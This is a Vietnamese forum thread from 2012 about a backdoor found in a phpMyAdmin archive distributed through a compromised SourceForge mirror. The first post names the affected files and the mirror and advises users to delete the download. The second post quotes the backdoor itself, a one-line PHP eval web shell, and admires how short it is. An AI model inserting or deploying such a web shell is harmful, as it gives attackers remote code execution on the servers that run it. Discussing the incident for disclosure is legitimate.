[Discussion] Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge |
28/09/2012 20:04:18 (+0700) | #1 | 269779 |
|
tranhuuphuoc
Moderator
|
Joined: 05/09/2004 06:08:09
Messages: 865
Location: Lầu Xanh
Offline
|
|
Người viết tin tức cho báo tuoitre này hình như hiểu nhầm, dùng từ "hàng triệu", trong tập tin nén phpMyAdmin 3.5.2.2-all-languages.zip này có chứa 1 tập tin js/cross_framing_protection.js và server_sync.php , chỉ những bạn nào download mirror sourceforge từ cdnetworks-kr-1 mới bị.
Tức là bạn download từ đây, thì bạn nên xóa ngay và tìm nguồn download khác thay vì mirror cdnetworks-kr-1 (hiện giờ mirror download này đã bị xóa trên sourceforge)
http://cdnetworks-kr-1.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.4.3.2/phpMyAdmin-3.4.3.2-all-languages.tar.gzhttp
Nguồn
http://nhipsongso.tuoitre.vn/Nhip-song-so/513467/Hang-trieu-website-gap-nguy-vi-cua-hau-trong-phpMyAdmin.html |
|
|
[Discussion] Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge |
28/09/2012 22:03:48 (+0700) | #2 | 269782 |
|
xuanphongdocco
Member
|
0 |
|
|
Joined: 19/08/2009 08:25:03
Messages: 247
Offline
|
|
Chỉ với 26 kí tự, thật bá đạo
<?php
@eval($_POST['c']);
?> |
|
Xuân Phong Nguyễn |
|
|